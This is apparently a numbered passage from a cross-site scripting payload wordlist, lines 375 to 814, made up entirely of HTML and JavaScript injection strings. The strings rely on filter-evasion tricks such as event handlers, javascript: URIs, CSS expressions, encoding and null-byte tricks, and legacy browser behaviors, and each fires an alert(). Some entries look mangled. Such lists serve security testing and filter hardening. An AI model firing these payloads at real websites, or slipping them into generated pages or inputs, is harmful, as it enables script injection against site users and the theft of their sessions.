  375. <style><img src="</style><img src=x onerror=javascript:alert(301)//">
  376. <li style=list-style:url() onerror=javascript:alert(302)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(302)></div>
  377. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(303)//#">XXX</a></body>
  378. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(304)</SCRIPT>
  379. <OBJECT CLASSID="clsid:333C7BC4-460F-305305D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(305)"></OBJECT>
  380. <b <script>alert(308)</script>0
  381. <div id="div309"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div309").innerHTML;</script>
  382. <x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'>
  383. <embed src="javascript:alert(311)">
  384. <img src="javascript:alert(312)">
  385. <image src="javascript:alert(313)">
  386. <script src="javascript:alert(314)">
  387. <div style=width:315px;filter:glow onfilterchange=javascript:alert(315)>x
  388. <? foo="><script>javascript:alert(316)</script>">
  389. <! foo="><script>javascript:alert(317)</script>">
  390. </ foo="><script>javascript:alert(318)</script>">
  391. <? foo="><x foo='?><script>javascript:alert(319)</script>'>">
  392. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
  393. <% foo><x foo="%><script>javascript:alert(321)</script>">
  394. <div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
  395. <img \x00src=x onerror="alert(323)">
  396. <img \x47src=x onerror="javascript:alert(324)">
  397. <img \x325325src=x onerror="javascript:alert(325)">
  398. <img \x3262src=x onerror="javascript:alert(326)">
  399. <img\x47src=x onerror="javascript:alert(327)">
  400. <img\x3280src=x onerror="javascript:alert(328)">
  401. <img\x3293src=x onerror="javascript:alert(329)">
  402. <img\x32src=x onerror="javascript:alert(330)">
  403. <img\x47src=x onerror="javascript:alert(331)">
  404. <img\x332332src=x onerror="javascript:alert(332)">
  405. <img \x47src=x onerror="javascript:alert(333)">
  406. <img \x34src=x onerror="javascript:alert(334)">
  407. <img \x39src=x onerror="javascript:alert(335)">
  408. <img \x00src=x onerror="javascript:alert(336)">
  409. <img src\x09=x onerror="javascript:alert(337)">
  410. <img src\x3380=x onerror="javascript:alert(338)">
  411. <img src\x3393=x onerror="javascript:alert(339)">
  412. <img src\x32=x onerror="javascript:alert(340)">
  413. <img src\x3412=x onerror="javascript:alert(341)">
  414. <img src\x342342=x onerror="javascript:alert(342)">
  415. <img src\x00=x onerror="javascript:alert(343)">
  416. <img src\x47=x onerror="javascript:alert(344)">
  417. <img src=x\x09onerror="javascript:alert(345)">
  418. <img src=x\x3460onerror="javascript:alert(346)">
  419. <img src=x\x347347onerror="javascript:alert(347)">
  420. <img src=x\x3482onerror="javascript:alert(348)">
  421. <img src=x\x3493onerror="javascript:alert(349)">
  422. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)">
  423. <img src=x onerror=\x09"javascript:alert(351)">
  424. <img src=x onerror=\x3520"javascript:alert(352)">
  425. <img src=x onerror=\x353353"javascript:alert(353)">
  426. <img src=x onerror=\x3542"javascript:alert(354)">
  427. <img src=x onerror=\x32"javascript:alert(355)">
  428. <img src=x onerror=\x00"javascript:alert(356)">
  429. <a href=java&#357&#2&#3&#4&#5&#6&#7&#8&#357357&#3572script:javascript:alert(357)>XXX</a>
  430. <img src="x` `<script>javascript:alert(358)</script>"` `>
  431. <img src onerror /" '"= alt=javascript:alert(359)//">
  432. <title onpropertychange=javascript:alert(360)></title><title title=>
  433. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>">
  434. <!--[if]><script>javascript:alert(362)</script -->
  435. <!--[if<img src=x onerror=javascript:alert(363)//]> -->
  436. <object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object>
  437. <a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X
  438. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
  439. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d
  440. <style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
  441. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a>
  442. <// style=x:expression\28javascript:alert(375)\29>
  443. <style>*{x:expression(javascript:alert(376))}</style>
  444. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X
  445. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script>
  446. <script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script>
  447. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script>
  448. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script>
  449. <meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾
  450. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` >
  451. 392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x4392vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(392)>`>
  452. 393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(393)>>
  453. 395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a>
  454. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a>
  455. <event-source src="%(event)s" onload="javascript:alert(399)">
  456. <a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  457. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img񡿹src=x:x񡿹onerror񡿹=javascript:alert(401)>">
  458. <script>javascript:alert(405)</script>
  459. <IMG SRC="javascript:javascript:alert(406);">
  460. <IMG SRC=javascript:javascript:alert(407)>
  461. <IMG SRC=`javascript:javascript:alert(408)`>
  462. <FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET>
  463. <BODY ONLOAD=javascript:alert(411)>
  464. <BODY ONLOAD=javascript:javascript:alert(412)>
  465. <IMG SRC="jav    ascript:javascript:alert(413);">
  466. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)>
  467. <IMG SRC="javascript:javascript:alert(417)"
  468. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);">
  469. <IMG DYNSRC="javascript:javascript:alert(420)">
  470. <IMG LOWSRC="javascript:javascript:alert(421)">
  471. <BGSOUND SRC="javascript:javascript:alert(422);">
  472. <BR SIZE="&{javascript:alert(423)}">
  473. <LINK REL="stylesheet" HREF="javascript:javascript:alert(425);">
  474. <STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS
  475. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);">
  476. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);">
  477. <IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>
  478. <TABLE BACKGROUND="javascript:javascript:alert(433)">
  479. <TABLE><TD BACKGROUND="javascript:javascript:alert(434)">
  480. <DIV STYLE="background-image: url(javascript:javascript:alert(435))">
  481. <DIV STYLE="width:expression(javascript:alert(436));">
  482. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))">
  483. <XSS STYLE="xss:expression(javascript:alert(438))">
  484. <STYLE TYPE="text/javascript">javascript:alert(439);</STYLE>
  485. <STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A>
  486. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE>
  487. <!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]-->
  488. <BASE HREF="javascript:javascript:alert(443);//">
  489. <OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT>
  490. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  491. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML>
  492. <form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X
  493. <body onscroll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  494. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)">
  495. <STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE>
  496. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&>
  497. <SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT>
  498. <style onreadystatechange=javascript:javascript:alert(457);></style>
  499. <?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html>
  500. <embed code=javascript:javascript:alert(460);></embed>
  501. <frameset onload=javascript:javascript:alert(462)></frameset>
  502. <object onerror=javascript:javascript:alert(463)>
  503. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml>
  504. <IMG SRC=&{javascript:alert(466);};>
  505. <a href="jav&#65ascript:javascript:alert(467)">test467</a>
  506. <a href="jav&#97ascript:javascript:alert(468)">test468</a>
  507. <iframe srcdoc="&LT;iframe&sol;srcdoc=<img&sol;src=&apos;&apos;onerror=javascript:alert(470)>>">
  508. ';alert(471))//';alert(471))//";
  509. alert(472))//";alert(472))//--
  510. ></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT>
  511. <IMG SRC="javascript:alert(476);">
  512. <IMG SRC=javascript:alert(477)>
  513. <IMG SRC=JaVaScRiPt:alert(478)>
  514. <IMG SRC=javascript:alert(479)>
  515. <IMG SRC=`javascript:alert(480)`>
  516. <a onmouseover="alert(481)">xxs link</a>
  517. <a onmouseover=alert(482)>xxs link</a>
  518. <IMG """><SCRIPT>alert(483)</SCRIPT>">
  519. <IMG SRC=javascript:alert(484))>
  520. <IMG SRC=# onmouseover="alert(485)">
  521. <IMG SRC= onmouseover="alert(486)">
  522. <IMG onmouseover="alert(487)">
  523. <IMG SRC="jav        ascript:alert(491);">
  524. <IMG SRC="jav        ascript:alert(492);">
  525. <IMG SRC="jav
  526. ascript:alert(493);">
  527. <IMG SRC="jav
    ascript:alert(494);">
  528. perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out
  529. <IMG SRC=" &#14;  javascript:alert(496);">
  530. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)>
  531. <<SCRIPT>alert(500);//<</SCRIPT>
  532. <IMG SRC="javascript:alert(503)"
  533. \";alert(505);//
  534. </TITLE><SCRIPT>alert(506);</SCRIPT>
  535. <INPUT TYPE="IMAGE" SRC="javascript:alert(507);">
  536. <BODY BACKGROUND="javascript:alert(508)">
  537. <IMG DYNSRC="javascript:alert(509)">
  538. <IMG LOWSRC="javascript:alert(510)">
  539. <STYLE>li {list-style-image: url("javascript:alert(511)");}</STYLE><UL><LI>XSS</br>
  540. <BODY ONLOAD=alert(514)>
  541. <BGSOUND SRC="javascript:alert(515);">
  542. <BR SIZE="&{alert(516)}">
  543. <LINK REL="stylesheet" HREF="javascript:alert(517);">
  544. <STYLE>@im\port'\ja\vasc\ript:alert(522)';</STYLE>
  545. <IMG STYLE="xss:expr/*XSS*/ession(alert(523))">
  546. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(524))'>
  547. <STYLE TYPE="text/javascript">alert(525);</STYLE>
  548. <STYLE>.XSS{background-image:url("javascript:alert(526)");}</STYLE><A CLASS=XSS></A>
  549. <STYLE type="text/css">BODY{background:url("javascript:alert(527)")}</STYLE>
  550. <STYLE type="text/css">BODY{background:url("javascript:alert(528)")}</STYLE>
  551. <XSS STYLE="xss:expression(alert(529))">
  552. ¼script¾alert(531)¼/script¾
  553. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(532);">
  554. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(534);">
  555. <IFRAME SRC="javascript:alert(535);"></IFRAME>
  556. <IFRAME SRC=# onmouseover="alert(536)"></IFRAME>
  557. <FRAMESET><FRAME SRC="javascript:alert(537);"></FRAMESET>
  558. <TABLE BACKGROUND="javascript:alert(538)">
  559. <TABLE><TD BACKGROUND="javascript:alert(539)">
  560. <DIV STYLE="background-image: url(javascript:alert(540))">
  561. <DIV STYLE="background-image: url(&#1;javascript:alert(542))">
  562. <DIV STYLE="width: expression(alert(543));">
  563. <BASE HREF="javascript:alert(544);//">
  564. <? echo('<SCR)';echo('IPT>alert(549)</SCRIPT>'); ?>
  565. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(552)</SCRIPT>">
  566. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4-
  567. <img src=`%00`&NewLine; onerror=alert(573)&NewLine;
  568. <script /*%00*/>/*%00*/alert(577)/*%00*/</script /*%00*/
  569. <iframe/src="data:text/html,<svg &#579579579;&#5795790;load=alert(579)>">
  570. <meta content="&NewLine; 580 &NewLine;; JAVASCRIPT&colon; alert(580)" http-equiv="refresh"/>
  571. <form><iframe         ᛸ򏬬 src="javascript:alert(588)"򏬬ᛸ        ;>
  572. http://www.google<script .com>alert(590)</script
  573. <script ^__^>alert(594))</script ^__^
  574. </style  ><script   :-(>/**/alert(595)/**/</script   :-(
  575. &#00;</form><input typeᧄ"date" onfocus="alert(596)">
  576. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(600)&NewLine;>X</a>
  577. <script ~~~>alert(601)</script ~~~>
  578. <iframe/%00/ src=javaSCRIPT&colon;alert(609)
  579. <%<!--'%><script>alert(626);</script -->
  580. <script src="data:text/javascript,alert(627)"></script>
  581. <iframe/onreadystatechange=alert(629)
  582. <svg/onload=alert(630)
  583. <input type="text" value=`` <div/onmouseover='alert(632)'>X</div>
  584. http://www.<script>alert(633)</script .com
  585. <svg><script ?>alert(635)
  586. <img src=`xx:xx`onerror=alert(637)>
  587. <meta http-equiv="refresh" content="0;javascript&colon;alert(639)"/>
  588. <script>+-+-649-+-+alert(649)</script>
  589. <body/onload=<!-->&#6500alert(650)>
  590. <script itworksinallbrowsers>/*<script* */alert(651)</script
  591. <img src ?itworksonchrome?\/onerror = alert(652)
  592. <svg><script onlypossibleinopera:-)> alert(654)
  593. <script x> alert(656) </script 656=2
  594. <div/onmouseover='alert(657)'> style="x:">
  595. <--`<img/src=` onerror=alert(658)> --!>
  596. <div style="position:absolute;top:0;left:0;width:66000%;height:66000%" onmouseover="prompt(660)" onclick="alert(660)">x</button>
  597. <form><button formaction=javascript&colon;alert(662)>CLICKME
  598. ‘; alert(667);
  599. ‘)alert(668);//
  600. <ScRiPt>alert(669)</sCriPt>
  601. <IMG SRC=jAVasCrIPt:alert(670)>
  602. <IMG SRC=”javascript:alert(671);”>
  603. <IMG SRC=javascript:alert(672)>
  604. <IMG SRC=javascript:alert(673)>
  605. <img src=xss onerror=alert(674)>
  606. <img src=`%00`&NewLine; onerror=alert(681)&NewLine;
  607. <script /*%00*/>/*%00*/alert(685)/*%00*/</script /*%00*/
  608. <iframe/src="data:text/html,<svg &#687687687;&#6876870;load=alert(687)>">
  609. <meta content="&NewLine; 688 &NewLine;; JAVASCRIPT&colon; alert(688)" http-equiv="refresh"/>
  610. <form><iframe         ᬰ򪅸 src="javascript:alert(696)"򪅸ᬰ        ;>
  611. http://www.google<script .com>alert(698)</script
  612. <script ^__^>alert(702))</script ^__^
  613. </style  ><script   :-(>/**/alert(703)/**/</script   :-(
  614. &#00;</form><input typeᨰ"date" onfocus="alert(704)">
  615. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(708)&NewLine;>X</a>
  616. <script ~~~>alert(709)</script ~~~>
  617. <iframe/%00/ src=javaSCRIPT&colon;alert(717)
  618. <%<!--'%><script>alert(734);</script -->
  619. <script src="data:text/javascript,alert(735)"></script>
  620. <iframe/onreadystatechange=alert(737)
  621. <svg/onload=alert(738)
  622. <input type="text" value=`` <div/onmouseover='alert(740)'>X</div>
  623. http://www.<script>alert(741)</script .com
  624. <svg><script ?>alert(743)
  625. <img src=`xx:xx`onerror=alert(745)>
  626. <meta http-equiv="refresh" content="0;javascript&colon;alert(746)"/>
  627. <script>+-+-756-+-+alert(756)</script>
  628. <body/onload=<!-->&#7570alert(757)>
  629. <script itworksinallbrowsers>/*<script* */alert(758)</script
  630. <img src ?itworksonchrome?\/onerror = alert(759)
  631. <svg><script onlypossibleinopera:-)> alert(761)
  632. <script x> alert(763) </script 763=2
  633. <div/onmouseover='alert(764)'> style="x:">
  634. <--`<img/src=` onerror=alert(765)> --!>
  635. <div style="xg-p:absolute;top:0;left:0;width:76700%;height:76700%" onmouseover="prompt(767)" onclick="alert(767)">x</button>
  636. <form><button formaction=javascript&colon;alert(769)>CLICKME
  637. ‘;alert(775))//’;alert(775))//”;alert(775))//”;alert(775))//–></SCRIPT>”>’><SCRIPT>alert(775))</SCRIPT>
  638. <IMG “””><SCRIPT>alert(776)</SCRIPT>”>
  639. <IMG SRC=javascript:alert(777))>
  640. <IMG SRC=”jav ascript:alert(778);”>
  641. <IMG SRC=”jav        ascript:alert(779);”>
  642. <<SCRIPT>alert(780);//<</SCRIPT>
  643. %253cscript%253ealert(781)%253c/script%253e
  644. “><s”%2b”cript>alert(782)</script>
  645. foo<script>alert(783)</script>
  646. <scr<script>ipt>alert(784)</scr</script>ipt>
  647. <BODY BACKGROUND=”javascript:alert(788)”>
  648. <BODY ONLOAD=alert(789)>
  649. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(790);”>
  650. <IMG SRC=”javascript:alert(791)”
  651. javascript:alert(793)
  652. <img src="javascript:alert(794);">
  653. <img src=javascript:alert(795)>
  654. <"';alert(796))//\';alert(796))//";alert(796))//\";alert(796))//--></SCRIPT>">'><SCRIPT>alert(796))</SCRIPT>
  655. <IFRAME SRC="javascript:alert(798);"></IFRAME>
  656. <<SCRIPT>alert(805);//<</SCRIPT>
  657. <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//--></SCRIPT>">'><SCRIPT>alert(806))</SCRIPT>
  658. ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//--></SCRIPT>">'><SCRIPT>alert(807))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  659. <script>alert(808)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  660. <script>alert(809);</script>&search=1
  661. 0&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  662. <BODY ONLOAD=alert(812)>
  663. <body onscroll=alert(815)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  664. <form><button formaction="javascript:alert(816)">lol
  665. <!--<img src="--><img src=x onerror=alert(817)//">
  666. <![><img src="]><img src=x onerror=alert(818)//">
  667. <style><img src="</style><img src=x onerror=alert(819)//">
  668. <? foo="><script>alert(820)</script>">
  669. <! foo="><script>alert(821)</script>">
  670. </ foo="><script>alert(822)</script>">
  671. <? foo="><x foo='?><script>alert(823)</script>'>">
  672. <! foo="[[[Inception]]"><x foo="]foo><script>alert(824)</script>">
  673. <% foo><x foo="%><script>alert(825)</script>">
  674. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(829)</script></svg>
  675. <SCRIPT>alert(830)</SCRIPT>
  676. \\";alert(831);//
  677. </TITLE><SCRIPT>alert(832);</SCRIPT>
  678. <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(833);\">
  679. <BODY BACKGROUND=\"javascript:alert(834)\">
  680. <BODY ONLOAD=alert(835)>
  681. <IMG DYNSRC=\"javascript:alert(836)\">
  682. <IMG LOWSRC=\"javascript:alert(837)\">
  683. <BGSOUND SRC=\"javascript:alert(838);\">
  684. <BR SIZE=\"&{alert(839)}\">
  685. <LINK REL=\"stylesheet\" HREF=\"javascript:alert(841);\">
  686. <STYLE>li {list-style-image: url(\"javascript:alert(847)\");}</STYLE><UL><LI>XSS
  687. žscriptualert(851)ž/scriptu
  688. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(852);\">
  689. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(854);\"
  690. <IFRAME SRC=\"javascript:alert(855);\"></IFRAME>
  691. <FRAMESET><FRAME SRC=\"javascript:alert(856);\"></FRAMESET>
  692. <TABLE BACKGROUND=\"javascript:alert(857)\">
  693. <TABLE><TD BACKGROUND=\"javascript:alert(858)\">
  694. <DIV STYLE=\"background-image: url(javascript:alert(859))\">
  695. <DIV STYLE=\"background-image: url(javascript:alert(861))\">
  696. <DIV STYLE=\"width: expression(alert(862));\">
  697. <STYLE>@im\port'\ja\vasc\ript:alert(863)';</STYLE>
  698. <IMG STYLE=\"xss:expr/*XSS*/ession(alert(864))\">
  699. <XSS STYLE=\"xss:expression(alert(865))\">
  700. xss:ex/*XSS*//*/*/pression(alert(867))'>
  701. <STYLE TYPE=\"text/javascript\">alert(868);</STYLE>
  702. <STYLE>.XSS{background-image:url(\"javascript:alert(869)\");}</STYLE><A CLASS=XSS></A>
  703. <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(870)\")}</STYLE>
  704. <SCRIPT>alert(872);</SCRIPT>
  705. <BASE HREF=\"javascript:alert(874);//\">
  706. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(876)></OBJECT>
  707. d=\"alert(882);\\")\";
  708. <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(885);\">]]>
  709. <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert(887)\"></B></I></XML>
  710. <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(894)</SCRIPT>\">
  711. echo('IPT>alert(899)</SCRIPT>'); ?>
  712. <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(902)</SCRIPT>\">
  713. <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(903);+ADw-/SCRIPT+AD4-
  714. <IMG SRC=\"javascript:alert(991)\"
  715. <<SCRIPT>alert(994);//<</SCRIPT>
  716. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(996)>
  717. <IMG SRC=\"   javascript:alert(998);\">
  718. perl -e 'print \"<SCR\0IPT>alert(999)</SCR\0IPT>\";' > out
  719. perl -e 'print \"<IMG SRC=java\0script:alert(1000)>\";' > out
  720. <IMG SRC=\"jav
    ascript:alert(1001);\">
  721. <IMG SRC=\"jav
  722. ascript:alert(1002);\">
  723. <IMG SRC=\"jav        ascript:alert(1003);\">
  724. <IMG SRC=javascript:alert(1006)>
  725. <IMG SRC=javascript:alert(1007))>
  726. <IMG \"\"\"><SCRIPT>alert(1008)</SCRIPT>\">
  727. <IMG SRC=`javascript:alert(1009)`>
  728. <IMG SRC=javascript:alert(1010)>
  729. <IMG SRC=JaVaScRiPt:alert(1011)>
  730. <IMG SRC=javascript:alert(1012)>
  731. <IMG SRC=\"javascript:alert(1013);\">
  732. ';alert(1016))//\';alert(1016))//\";alert(1016))//\\";alert(1016))//--></SCRIPT>\">'><SCRIPT>alert(1016))</SCRIPT>
  733. ';alert(1017))//\';alert(1017))//";alert(1017))//\";alert(1017))//--></SCRIPT>">'><SCRIPT>alert(1017))</SCRIPT>
  734. <IMG SRC="javascript:alert(1020);">
  735. <IMG SRC=javascript:alert(1021)>
  736. <IMG SRC=javascrscriptipt:alert(1022)>
  737. <IMG SRC=JaVaScRiPt:alert(1023)>
  738. <IMG """><SCRIPT>alert(1024)</SCRIPT>">
  739. <IMG SRC=" &#14;  javascript:alert(1025);">
  740. <<SCRIPT>alert(1028);//<</SCRIPT>
  741. <SCRIPT>a=/XSS/alert(1029)</SCRIPT>
  742. \";alert(1030);//
  743. </TITLE><SCRIPT>alert(1031);</SCRIPT>
  744. ¼script¾alert(1032)¼/script¾
  745. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1033);">
  746. <IFRAME SRC="javascript:alert(1034);"></IFRAME>
  747. <FRAMESET><FRAME SRC="javascript:alert(1035);"></FRAMESET>
  748. <TABLE BACKGROUND="javascript:alert(1036)">
  749. <TABLE><TD BACKGROUND="javascript:alert(1037)">
  750. <DIV STYLE="background-image: url(javascript:alert(1038))">
  751. <DIV STYLE="width: expression(alert(1040));">
  752. <STYLE>@im\port'\ja\vasc\ript:alert(1041)';</STYLE>
  753. <IMG STYLE="xss:expr/*XSS*/ession(alert(1042))">
  754. <XSS STYLE="xss:expression(alert(1043))">
  755. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1044))'>
  756. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(1048)</SCRIPT>"></BODY></HTML>
  757. <form id="test" /><button form="test" formaction="javascript:alert(1050)">TESTHTML5FORMACTION
  758. <form><button formaction="javascript:alert(1051)">crosssitespt
  759. <frameset onload=alert(1052)>
  760. <!--<img src="--><img src=x onerror=alert(1053)//">
  761. <style><img src="</style><img src=x onerror=alert(1054)//">
  762. <embed src="javascript:alert(1057)">
  763. <? foo="><script>alert(1058)</script>">
  764. <! foo="><script>alert(1059)</script>">
  765. </ foo="><script>alert(1060)</script>">
  766. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1062)}),x</script>
  767. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1063)')()</script>
  768. <script src="#">{alert(1064)}</script>;1064
  769. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1065)',384,null,'rsa-dual-use')</script>
  770. <svg xmlns="#"><script>alert(1066)</script></svg>
  771. <svg onload="javascript:alert(1067)" xmlns="#"></svg>
  772. <iframe xmlns="#" src="javascript:alert(1068)"></iframe>
  773. +ADw-script+AD4-alert(1069)+ADw-/script+AD4-
  774. %2BADw-script+AD4-alert(1070)%2BADw-/script%2BAD4-
  775. +ACIAPgA8-script+AD4-alert(1071)+ADw-/script+AD4APAAi-
  776. %253cscript%253ealert(1073)%253c/script%253e
  777. “><s”%2b”cript>alert(1074)</script>
  778. “><ScRiPt>alert(1075)</script>
  779. “><<script>alert(1076);//<</script>
  780. foo<script>alert(1077)</script>
  781. <scr<script>ipt>alert(1078)</scr</script>ipt>
  782. ‘; alert(1080); var foo=’
  783. foo\’; alert(1081);//’;
  784. </script><script >alert(1082)</script>
  785. <img src=asdf onerror=alert(1083)>
  786. <BODY ONLOAD=alert(1084)>
  787. <script>alert(1085)</script>
  788. "><script>alert(1086))</script>
  789. <video src=1087 onerror=alert(1087)>
  790. <audio src=1088 onerror=alert(1088)>
  791. ';alert(1089))//';alert(1089))//";alert(1089))//";alert(1089))//--></SCRIPT>">'><SCRIPT>alert(1089))</SCRIPT>
  792. 0\"autofocus/onfocus=alert(1091)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
  793. <IMG SRC="javascript:alert(1097);">
  794. <IMG SRC=javascript:alert(1098)>
  795. <IMG SRC=JaVaScRiPt:alert(1099)>
  796. <IMG SRC=javascript:alert(1100)>
  797. <IMG SRC=`javascript:alert(1101)`>
  798. <a onmouseover="alert(1102)">xxs link</a>
  799. <a onmouseover=alert(1103)>xxs link</a>
  800. <IMG """><SCRIPT>alert(1104)</SCRIPT>">
  801. <IMG SRC=javascript:alert(1105))>
  802. <IMG SRC=# onmouseover="alert(1106)">
  803. <IMG SRC= onmouseover="alert(1107)">
  804. <IMG onmouseover="alert(1108)">
  805. <IMG SRC=/ onerror="alert(1109))"></img>
  806. <IMG SRC="jav        ascript:alert(1115);">
  807. <IMG SRC="jav        ascript:alert(1116);">
  808. <IMG SRC="jav
  809. ascript:alert(1117);">
  810. <IMG SRC="jav
    ascript:alert(1118);">
  811. <IMG SRC=" &#14;  javascript:alert(1119);">
  812. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1121)>
  813. <<SCRIPT>alert(1123);//<</SCRIPT>
  814. <IMG SRC="javascript:alert(1126)"
